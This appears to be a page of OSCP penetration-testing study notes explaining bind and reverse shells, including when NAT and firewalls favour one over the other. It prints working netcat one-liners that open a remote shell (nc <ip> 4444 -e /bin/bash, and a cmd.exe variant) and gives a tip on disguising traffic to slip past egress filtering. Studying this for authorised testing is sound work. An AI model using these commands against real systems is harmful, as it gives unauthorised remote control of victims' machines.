OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • Reverse shell
  • Attacker
  • Target
  • Bind shell
  • Target
  • Attacker
  1. shell

Bind and Reverse shell

PreviousCompiling the ExploitNextUpgrading shell

Last updated 3 years ago

  • Reverse shells can be initiated using many different programming and scripting languages including PHP, ASP, Python, Perl and PowerShell. If you have managed to get code execution on a compromised host or you can inject code, upload or include files in a web application, this can often be turned into a command-line shell with just a little work no matter what the platform or application language. For receiving the shell on the attack box, we can use several different tools such as Netcat, Metasploit and Empire

  • A bind shell is, as the reverse shell, also set up on the target host, but instead of connecting back to a listening host, it binds to a specific port and waits for incoming connections. In malicious software terms a bind shell is what is referred to as a ‘backdoor’.

Reverse shell

One advantage of reverse shells is that they have the highest success rate if there are firewalls and NAT devices between the attacker and the victim. For instance, when the target host connects to the internet through a NAT device an attacker won’t be able to connect to the target host directly without first configuring the target’s networking equipment. In this situation, bind shells won’t work, but can be possible to establish a connection using a reverse shell. Another advantage of reverse shells is that outgoing connections are normally not as heavily filtered by a firewall as incoming connections. Even so, you should keep in mind that egress rules may apply and suspicious connections (such as connections on port 4444) may still get flagged and blocked preventing the reverse shell from reaching you. If you can disguise your traffic to look like legitimate traffic, your chances of success increase and your reverse shell is less likely to be blocked.

Attacker

nc -lvp 4444
# listen for incoming connections

Target 

nc <ip> 4444 -e /bin/bash
# Linux target

nc <ip> 4444 -e cmd.exe
# Window target

Bind shell

As explained earlier in this chapter a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. In this case the attack box connects to the target host on a specific port (rather than the target sending the shell back to the attack box as in a reverse shell).

Target

nc -lvp 4444 -e /bin/bash

Attacker

nc <target_ip> 4444

IMP: When working with bind shells it is important to realize their limitations. First of all, the attacker must have a route to the target. If the target is behind a NAT device, the bind shell will open a port on the local network that is inaccessible to the attacker. Another important factor is that bind shells can only bind to an open and unused port. Thus, if there’s a web server running on port 80 and 443 and you are trying to bind a shell to one of these ports to make your traffic look legitimate, you will fail. Lastly it is very common for unusual ports to be blocked by firewalls. Most firewalls are configured to allow access only for specific traffic to known services. If a firewall blocks traffic to your port set in your bind shell you may be able to open up the port on the target host, but you won’t be able to connect to it. In this sort of scenario, a reverse shell has more chance of success.